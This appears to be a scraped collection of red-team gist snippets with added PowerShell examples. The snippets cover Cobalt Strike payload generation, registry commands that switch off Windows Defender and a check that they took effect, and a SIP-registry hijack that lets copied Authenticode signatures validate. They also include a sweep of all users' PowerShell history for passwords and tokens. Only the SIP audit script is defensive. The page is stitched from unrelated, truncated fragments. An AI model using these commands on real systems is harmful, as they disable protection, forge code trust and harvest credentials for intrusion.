
Aggressor Scripting Notes

Read data from the C2 profile

# Read the initial sleep time and jitter set in the C2 profile
$profile = data_query("metadata")["c2profile"];
$initialsleep = [$profile getString: ".sleeptime"];
$initialjitter = [$profile getString: ".jitter"];
# Stageless Payload Generator
# Author: @joevest
# Generates all stageless payload types for each current listener
# Directory for Payloads
mkdir("/payloads");
println("Stageless Payload Generator");
menubar("Stageless Payload Generator", "payloadgenerator");
@vestjoe
vestjoe / random_file_generator.py
Last active March 10, 2024 19:57
Generate valid random files
'''
# Random file generator
# This tool generates random valid files of various types using real data based on Lorem Ipsum. Files are created in a custom directory structure.
# Generates random files based on Lorem Ipsum text
# Generates random file names from a word list
# Generates valid files of type: txt, docx, xlsx, pptx, xml, config
# Requirements
# On Windows download and install lxml manually: https://pypi.python.org/pypi/lxml/3.4.4
'''
@vestjoe
vestjoe / find-files.ps1
Last active August 6, 2020 16:04
PowerShell file search
Function Find-Files() {
<#
.SYNOPSIS
Returns file list based on search terms.
.DESCRIPTION
Function: Find-Files
Function GET-RdmString() {
param (
[int]$Length
)
# Lowercase alphanumeric character set to draw from
$set = "abcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
$result = ""
# Append one randomly chosen character per iteration until the requested length is reached
for ($x = 0; $x -lt $Length; $x++) {
$result += $set | Get-Random
}
return $result
}
@vestjoe
vestjoe / disable_windows_av.md
Created March 17, 2020 13:21
Disable Windows AV for testing

Windows 10 Disable Virus and Threat Protections

Note: these are policy values, and Defender only honours them while Tamper Protection is off (Windows Security > Virus & threat protection settings). On Windows 10 version 2004 and later the DisableAntiSpyware value is ignored regardless; check Get-MpComputerStatus afterwards rather than trusting the registry write.

:: Turn Off Windows Defender
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

:: Cloud-protection level
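The same policy values applied from PowerShell, followed by the check that tells you whether Defender actually honoured them. This is an added example, not part of the gist; it uses only the registry paths above and the built-in Defender cmdlets (Set-MpPreference, Get-MpComputerStatus) and must run in an elevated session.

```powershell
# Added example, not from the gist. Needs an elevated PowerShell session.
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
$rtp    = Join-Path $policy 'Real-Time Protection'

# Same four DWORDs as the REG ADD lines above, written through the registry provider.
foreach ($key in @($policy, $rtp)) {
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
}
Set-ItemProperty -Path $policy -Name DisableAntiSpyware           -Value 1 -Type DWord
Set-ItemProperty -Path $policy -Name DisableRoutinelyTakingAction -Value 1 -Type DWord
Set-ItemProperty -Path $rtp    -Name DisableBehaviorMonitoring    -Value 1 -Type DWord
Set-ItemProperty -Path $rtp    -Name DisableRealtimeMonitoring    -Value 1 -Type DWord

# The supported way to ask for the same thing; also refused while Tamper Protection is on.
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Continue

# Verify against what the engine reports, not against the registry: with Tamper
# Protection enabled the policy values above are written but ignored.
$status = Get-MpComputerStatus
[pscustomobject]@{
    IsTamperProtected          = $status.IsTamperProtected
    RealTimeProtectionEnabled  = $status.RealTimeProtectionEnabled
    BehaviorMonitorEnabled     = $status.BehaviorMonitorEnabled
    AntivirusEnabled           = $status.AntivirusEnabled
    PolicyDisableRealtimeValue = (Get-ItemProperty -Path $rtp).DisableRealtimeMonitoring
} | Format-List

if ($status.IsTamperProtected) {
    Write-Warning 'Tamper Protection is on: disable it in Windows Security > Virus & threat protection settings, then re-run.'
}
```

If PolicyDisableRealtimeValue shows 1 but RealTimeProtectionEnabled is still True, the registry change was accepted and ignored; that is the Tamper Protection case, and no amount of REG ADD will change it.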
@vestjoe
vestjoe / usersim.ps1
Created April 18, 2019 16:49
usersim
param
(
$username,
$password,
$domain
)
# Setup User Simulation
"[*] Setting up User Simulation" | Out-File -FilePath C:\Users\Public\usersim.txt -Append
$run = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'

Change SIP Signature validation for PE files

reg ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v DLL /t REG_SZ /d C:\Windows\System32\ntdll.dll /f
reg ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v FuncName /t REG_SZ /d DbgUiContinue /f

Note: {C689AAB8-8E78-11D0-8C47-00C04FC295EE} is the PE image SIP. Pointing its VerifyIndirectData hook at ntdll!DbgUiContinue makes the hash-comparison step return success for every PE, so a signature block copied from another signed binary validates (the certificate chain is still checked, so a file with no signature at all still fails). On 64-bit Windows this key is read only by 64-bit callers; 32-bit verifiers read the same path under HKLM\SOFTWARE\WOW6432Node. Defaults to restore afterwards: DLL = C:\Windows\System32\WINTRUST.DLL, FuncName = CryptSIPVerifyIndirectData.
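A check for the registration those two reg ADD lines overwrite, added here as an example (not part of the gist). It compares the PE-image SIP's VerifyIndirectData entry against its default, WINTRUST.DLL!CryptSIPVerifyIndirectData, in both the native and the WOW6432Node view, and lists every other registered SIP so an unexpected DLL stands out. The expected default values are an assumption stated in the code; confirm them against a clean build of the target OS before treating a mismatch as a finding.

```powershell
# Added example, not from the gist. Audits CryptSIPDllVerifyIndirectData registrations.
$peSip = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'   # PE image SIP, the GUID hijacked above

# Assumed defaults for the PE SIP on a clean Windows 10 build (verify on your own baseline).
$expected = @{ Dll = 'C:\Windows\System32\WINTRUST.DLL'; FuncName = 'CryptSIPVerifyIndirectData' }

# Native and WOW64 views: a hijack written to only one of them still redirects every
# process that reads that view, so both are checked.
$roots = @(
    'HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
)

$report = foreach ($root in $roots) {
    if (-not (Test-Path $root)) { continue }
    $view = if ($root -like '*WOW6432Node*') { 'WOW64' } else { 'Native' }
    foreach ($key in Get-ChildItem -Path $root) {
        $p    = Get-ItemProperty -Path $key.PSPath
        $flag = ''
        if ($key.PSChildName -eq $peSip) {
            # -ne on strings is case-insensitive in PowerShell, which is what we want for paths.
            if ($p.Dll -ne $expected.Dll -or $p.FuncName -ne $expected.FuncName) { $flag = 'PE SIP HIJACKED' }
        } elseif ($p.Dll -match '\\' -and $p.Dll -notlike "$env:SystemRoot\*") {
            # Any other SIP whose verifier DLL lives outside the Windows directory deserves a look.
            $flag = 'DLL outside SystemRoot'
        }
        [pscustomobject]@{
            View     = $view
            Subject  = $key.PSChildName
            Dll      = $p.Dll
            FuncName = $p.FuncName
            Flag     = $flag
        }
    }
}
$report | Format-Table -AutoSize
```

After the two reg ADD lines the Native row for the PE SIP reads ntdll.dll / DbgUiContinue and is flagged; the WOW64 row stays at its default unless the same writes are repeated under WOW6432Node. Run the audit again after restoring the defaults to confirm the cleanup.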

Change SIP Signature validation for signed PowerShell scripts

PowerShell.md

PowerShell commandline history

Get-PSReadlineOption | Select-Object -ExpandProperty HistorySavePath | Get-ChildItem | Get-Content
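The one-liner above reads only the current user's history. This added example (not from the gist) walks every profile under C:\Users for PSReadLine history files and pulls out lines that look like they carry credentials. It assumes the default history location (AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\) and a keyword list of my own choosing, and needs rights to read other users' profiles.

```powershell
# Added example, not from the gist. Needs read access to other users' profiles (normally admin).
# The keyword list is a starting point, not a definition of "credential"; tune it per engagement.
$pattern = 'password|passwd|secret|token|apikey|ConvertTo-SecureString|-Credential|net use|runas|cmdkey'

# Default PSReadLine location. The file name depends on the host (ConsoleHost_history.txt,
# "Visual Studio Code Host_history.txt"), hence the wildcard on the name as well as the user.
$histories = Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\*_history.txt' `
                           -ErrorAction SilentlyContinue

$hits = foreach ($file in $histories) {
    $user = $file.FullName.Split('\')[2]        # C:\Users\<user>\...
    Select-String -Path $file.FullName -Pattern $pattern |
        ForEach-Object {
            [pscustomobject]@{
                User    = $user
                Host    = $file.BaseName
                Line    = $_.LineNumber
                Command = $_.Line.Trim()
            }
        }
}
$hits | Format-Table -AutoSize -Wrap
```

If a user has moved their history with Set-PSReadLineOption -HistorySavePath, only the one-liner run in that user's own session will find it; the wildcard path covers the default location only.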

Screenshot

Pyinstaller

python -m PyInstaller --onefile <script.py>